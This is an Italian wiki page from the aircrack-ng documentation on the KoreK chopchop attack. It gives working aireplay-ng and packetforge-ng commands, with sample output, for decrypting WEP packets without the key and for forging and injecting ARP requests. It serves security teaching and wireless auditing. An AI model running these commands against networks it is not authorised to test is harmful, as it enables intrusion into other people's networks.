Strumenti Utente

Strumenti Sito


it:korek_chopchop

KoreK chopchop

Descrizione

Questo attacco, ammesso che abbia successo, può decifrare un pacchetto dati cifrato con WEP senza conoscere la chiave. Può funzionare anche con chiavi WEP dinamiche. Questo attacco non recupera la chiave WEP in se, ma rivela il plaintext (testo in chiaro). Comunque, non tutti gli access point sono vulnerabili a questo tipo di attacco. Alcuni possono sembrare vulnerabili ma in realtà scartano tutti i pacchetti di lunghezza inferiore a 60 byte. Se l'access point scarta i pacchetti inferiori a 42 byte, aireplay prova ad indovinare il resto dei dati mancanti, per quanto riguarda gli headers sono prevedibili. Se viene catturato un pacchetto IP, esso verifica se il checksum dell'header sia corretto dopo aver indovinato le sue parti mancanti. Questo attacco richiede almeno un pacchetto dati WEP.

Se si vuole imparare di più sulla teoria che sta dietro questo attacco, vedere la Teoria dell'attacco Chopchop.

Utilizzo

 aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

Dove:

  • -4 indica l'utilizzo dell'attacco chopchop
  • -h 00:09:5B:EC:EE:F2 è il MAC address di un client associato o di quello della propria scheda associato mediante l'attacco fake authenticaion
  • -b 00:14:6C:7E:40:80 è il MAC address dell'Access Point
  • ath0 è l'interfaccia wireless da utilizzare

Anche se non viene mostrato, è possibile usare altri filtri di aireplay-ng. La pagina principale di aireplay-ng contiene la lista completa. Filtri tipici potrebbero essere -m e -n per settare la lunghezza minima e massima del pacchetto da selezionare.

Se non viene utilizzata l'opzione ”-h”, viene effettuato un attacco chopchop non autenticato. Vedere l'esempio di sotto per maggiori dettagli.

Esempi

Esempio con output di esempio

Questo è un esempio di attacco chopchop autenticato. Significa che prima bisogna effettuare un attacco di fake authentication ed usare il MAC address con l'opzione ”-h”. Di conseguenza tutti i pacchetti saranno inviati avendo come sorgente il MAC specificato con l'opzione ”-h” e come MAC di destinazione una variazione di 256 combinazioni.

 aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

Dove:

  • -4 indica l'utilizzo dell'attacco chopchop
  • -h 00:09:5B:EC:EE:F2 è il MAC address della scheda wireless che deve coincidere con quello utilizzato durante il fake authentication
  • -b 00:14:6C:7E:40:80 è il MAC address dell'Access Point
  • ath0 è l'interfaccia wireless da utilizzare

Il sistema risponde con:

      Read 165 packets...

         Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
         BSSID  =  00:14:6C:7E:40:80
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:40:F4:77:E5:C9
 
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._.."
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...>.q.r.e.i.
         0x0050:  cfeb 4a72 be46                           ..Jr.F

 Use this packet ? y

Rispondendo “y” come sopra il systema continua come segue.

 Saving chosen packet in replay_src-0201-191639.cap
 
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms
 Offset   80 ( 9% done) | xor = CF | pt = 00 |  152 frames written in   456ms
 Offset   79 (11% done) | xor = 05 | pt = 00 |   29 frames written in    87ms
 Offset   78 (13% done) | xor = 69 | pt = 00 |  151 frames written in   454ms
 Offset   77 (15% done) | xor = CA | pt = 00 |   24 frames written in    71ms
 Offset   76 (17% done) | xor = 65 | pt = 00 |  129 frames written in   387ms
 Offset   75 (19% done) | xor = 9E | pt = 00 |   36 frames written in   108ms
 Offset   74 (21% done) | xor = 72 | pt = 00 |   39 frames written in   117ms
 Offset   73 (23% done) | xor = 01 | pt = 00 |  146 frames written in   438ms
 Offset   72 (25% done) | xor = 71 | pt = 00 |   83 frames written in   249ms
 Offset   71 (26% done) | xor = A1 | pt = 00 |   43 frames written in   129ms
 Offset   70 (28% done) | xor = 3E | pt = 00 |   98 frames written in   294ms
 Offset   69 (30% done) | xor = BB | pt = 00 |  129 frames written in   387ms
 Offset   68 (32% done) | xor = AE | pt = 00 |  248 frames written in   744ms
 Offset   67 (34% done) | xor = FB | pt = 00 |  105 frames written in   315ms
 Offset   66 (36% done) | xor = 43 | pt = 00 |  101 frames written in   303ms
 Offset   65 (38% done) | xor = D4 | pt = 00 |  158 frames written in   474ms
 Offset   64 (40% done) | xor = 16 | pt = 00 |  197 frames written in   591ms
 Offset   63 (42% done) | xor = 7F | pt = 0C |   72 frames written in   217ms
 Offset   62 (44% done) | xor = 1F | pt = 37 |  166 frames written in   497ms
 Offset   61 (46% done) | xor = 5C | pt = A8 |  119 frames written in   357ms
 Offset   60 (48% done) | xor = 9B | pt = C0 |  229 frames written in   687ms
 Offset   59 (50% done) | xor = 91 | pt = 00 |  113 frames written in   339ms
 Offset   58 (51% done) | xor = 25 | pt = 00 |  184 frames written in   552ms
 Offset   57 (53% done) | xor = 94 | pt = 00 |   33 frames written in    99ms
 Offset   56 (55% done) | xor = F3 | pt = 00 |  193 frames written in   579ms
 Offset   55 (57% done) | xor = D6 | pt = 00 |   17 frames written in    51ms
 Offset   54 (59% done) | xor = FA | pt = 00 |   81 frames written in   243ms
 Offset   53 (61% done) | xor = EA | pt = 01 |   95 frames written in   285ms
 Offset   52 (63% done) | xor = 5D | pt = 37 |   24 frames written in    72ms
 Offset   51 (65% done) | xor = 33 | pt = A8 |   20 frames written in    59ms
 Offset   50 (67% done) | xor = CC | pt = C0 |   97 frames written in   291ms
 Offset   49 (69% done) | xor = 03 | pt = C9 |  188 frames written in   566ms
 Offset   48 (71% done) | xor = 34 | pt = E5 |   48 frames written in   142ms
 Offset   47 (73% done) | xor = 34 | pt = 77 |   64 frames written in   192ms
 Offset   46 (75% done) | xor = 51 | pt = F4 |  253 frames written in   759ms
 Offset   45 (76% done) | xor = 98 | pt = 40 |  109 frames written in   327ms
 Offset   44 (78% done) | xor = 3D | pt = 00 |  242 frames written in   726ms
 Offset   43 (80% done) | xor = 5E | pt = 01 |  194 frames written in   583ms
 Offset   42 (82% done) | xor = AF | pt = 00 |   99 frames written in   296ms
 Offset   41 (84% done) | xor = C4 | pt = 04 |  164 frames written in   492ms
 Offset   40 (86% done) | xor = CE | pt = 06 |   69 frames written in   207ms
 Offset   39 (88% done) | xor = 9D | pt = 00 |  137 frames written in   411ms
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms
 Sent 957 packets, current guess: B9...
 
 The AP appears to drop packets shorter than 35 bytes.
 Enabling standard workaround: ARP header re-creation.
 
 Saving plaintext in replay_dec-0201-191706.cap
 Saving keystream in replay_dec-0201-191706.xor
 
 Completed in 21s (2.29 bytes/s)

Successo! Il file “replay_dec-0201-191706.xor” può essere usato in seguito per generare un pacchetto con packetforge-ng (ad esempio un pacchetto ARP). E' possibile utilizzare anche tcpdump o Wireshark per visualizzare il pacchetto decifrato contenuto in replay_dec-0201-191706.cap.

Chopchop senza autenticazione

Questo è un esempio di attacco chopchop senza autenticazione. Significa che non è necessario aver effettuato un attacco di fake authentication e che quindi è possibile omettere l'opzione ”-h”. Di conseguenza tutti i pacchetti saranno inviati avendo come sorgente una combinazione random di 256 MAC address e come destinazione un MAC address broadcast.

Questo funziona solo con un numero molto limitato di Access Point (AP). Gli AP vulnerabili invieranno solo un pacchetto di disconnessione (deauthentication) se il pacchetto sorgente risulta valido. In questo caso è stato determinato un byte.

 aireplay-ng -4 -b 00:14:6C:7E:40:80 ath0

Dove:

  • -4 indica l'utilizzo dell'attacco chopchop
  • -b 00:14:6C:7E:40:80 è il MAC address dell'Access Point
  • ath0 è l'interfaccia wireless da utilizzare

Generare un pacchetto ARP

1. Primo, decifrare un pacchetto

    aireplay-ng -4 ath0

Se non funziona, nella maggior parte dei casi l'access point scarterà il pacchetto perché non conosce il MAC che l'ha inviato. In questo caso bisogna utilizzare il MAC address di un client connesso ed abilitato ad inviare dati in rete:

    aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Dare un'occhiata all'indirizzo IP

    tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
    reading from file replay_dec-0627-022301.cap, link-type [...]
    IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Quindi, realizzare un ARP request. L'IP sorgente (192.168.1.100) non importa, ma l'IP di destinazione (192.168.1.2) deve rispondere all'ARP request. Il MAC sorgente deve appartenere ad un client associato, nel caso in cui l'access point filtri il traffico non associato.

    packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B -k 192.168.1.2 -l 192.168.1.100 -y replay_dec-0627-022301.xor -w arp.cap

4. Ed iniettare il pacchetto di ARP request realizzato

    aireplay-ng -2 -r arp.cap ath0

Suggerimenti

Quando dire di no ad un pacchetto? Ci si potrebbe chiedere se esistono delle volte in qui bisogna dire “no” alla selezione di un pacchetto specifico. Qui vi sono alcuni esempi sul quando bisognerebbe rispondere no:

  • La lunghezza del pacchetto è troppo piccola e si vuole/necessita un PRGA più lungo della lunghezza del pacchetto in questione.
  • Si cerca di decifrare un pacchetto da/verso un client specifico e bisogna attendere un pacchetto da/verso il MAC address di quel client.
  • Si sceglie appositamente un pacchetto piccolo. Il motivo è che il tempo di decifrazione è lineare alla lunghezza del pacchetto. I pacchetti piccoli prendono meno tempo.

Risoluzione dei problemi

Vedere anche la risoluzione dei problemi generali di aireplay-ng: risoluzione dei problemi di aireplay-ng.

Sebbene non vi siano soluzioni dirette per l'attacco chopchop, se non è possibile effettuarlo esistono valide alternative da considerare:

  • Attacco Fragmentation: Una tecnica alternativa per ottenere il PRGA al fine di realizzare pacchetti per una sequenza di injection.
  • metodo -p 0841: Questa tecnica permette di iniettare i pacchetti ricevuti dall'access point e generare IV.
it/korek_chopchop.txt · Ultima modifica: 2009/08/19 11:19 da drosophila